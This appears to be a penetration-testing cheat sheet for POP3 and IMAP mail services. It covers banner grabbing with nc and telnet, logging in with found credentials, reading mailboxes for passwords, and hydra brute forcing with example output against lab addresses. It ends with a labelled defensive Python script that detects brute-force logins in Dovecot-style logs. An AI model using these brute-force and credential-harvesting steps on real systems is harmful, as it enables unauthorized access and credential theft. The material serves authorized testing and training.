POP3 (110/995) / IMAP (143/993)
Banner grab
Version info — Check for exploits
nc -nv $IP 110
nc -nv $IP 143
Example Output
telnet 10.10.10.5 110
+OK Dovecot POP3 ready <1234.abc@target>
telnet 10.10.10.5 143
* OK [CAPABILITY IMAP4rev1] Dovecot IMAP ready
(Check version: Dovecot 2.2.x has known auth bypass CVEs)
Login with found creds
Try creds from other services — Read emails for more creds
telnet $IP 110
USER <user>
PASS <pass>
Example Output
telnet 10.10.10.5 110
+OK POP3 server ready
USER admin
+OK
PASS admin123
+OK Logged in.
LIST
1 1024
2 2048
(2 emails to read)
List and read emails
After POP3 login — Emails often contain passwords
LIST
RETR 1
RETR 2
Example Output
RETR 1
From: sysadmin@corp.local
Subject: New server credentials
Hi, the new server password is: Summer2024!
Please change it ASAP.
(CREDENTIALS IN EMAIL)
Brute force
If you have a username — Weak mail passwords
hydra -l <user> -P passwords.txt $IP pop3
Example Output
hydra -l admin -P rockyou.txt 10.10.10.5 pop3
[110][pop3] login: admin password: welcome1
hydra -l admin -P rockyou.txt 10.10.10.5 imap
[143][imap] login: admin password: welcome1
(Now read their emails for creds/info)
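Defender-side view of the brute force above, as an added example that is not part of the original cheat sheet: it counts failed POP3/IMAP logins per source IP and user, and flags a successful login that follows a burst of failures. The log lines are constructed in the style of Dovecot's pop3-login/imap-login messages; the function name analyse and the threshold of 5 are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in the style of Dovecot login logs (not from the page).
SAMPLE_LOG = """\
Jan 10 09:00:01 mail dovecot: pop3-login: Disconnected (auth failed, 3 attempts in 6 secs): user=<admin>, method=PLAIN, rip=10.10.14.3, lip=10.10.10.5
Jan 10 09:00:08 mail dovecot: pop3-login: Disconnected (auth failed, 3 attempts in 6 secs): user=<admin>, method=PLAIN, rip=10.10.14.3, lip=10.10.10.5
Jan 10 09:01:30 mail dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<jsmith>, method=PLAIN, rip=10.10.20.7, lip=10.10.10.5
Jan 10 09:01:41 mail dovecot: imap-login: Login: user=<jsmith>, method=PLAIN, rip=10.10.20.7, lip=10.10.10.5, mpid=2211
Jan 10 09:02:15 mail dovecot: pop3-login: Login: user=<admin>, method=PLAIN, rip=10.10.14.3, lip=10.10.10.5, mpid=2240
"""

FAIL = re.compile(r"(?:pop3|imap)-login: .*auth failed, (?P<n>\d+) attempts"
                  r".*user=<(?P<user>[^>]*)>.*rip=(?P<rip>[\d.]+)")
OK = re.compile(r"(?:pop3|imap)-login: Login: user=<(?P<user>[^>]*)>"
                r".*rip=(?P<rip>[\d.]+)")

def analyse(log_text, threshold=5):
    """Return alerts as (kind, source_ip, user, failed_attempts) tuples."""
    failures = defaultdict(int)  # (source_ip, user) -> failed attempts so far
    alerts = []
    for line in log_text.splitlines():
        m = FAIL.search(line)
        if m:
            key = (m["rip"], m["user"])
            before = failures[key]
            failures[key] += int(m["n"])
            # Alert once, at the moment the running total crosses the threshold.
            if before < threshold <= failures[key]:
                alerts.append(("bruteforce", *key, failures[key]))
            continue
        m = OK.search(line)
        if m:
            key = (m["rip"], m["user"])
            # A success right after many failures means the guess worked:
            # treat the mailbox and every password stored in it as exposed.
            if failures[key] >= threshold:
                alerts.append(("login_after_bruteforce", *key, failures[key]))
            failures[key] = 0
    return alerts

if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

A login_after_bruteforce alert is the case the notes above describe from the other side: reset that account and rotate any credentials that were sitting in its mail.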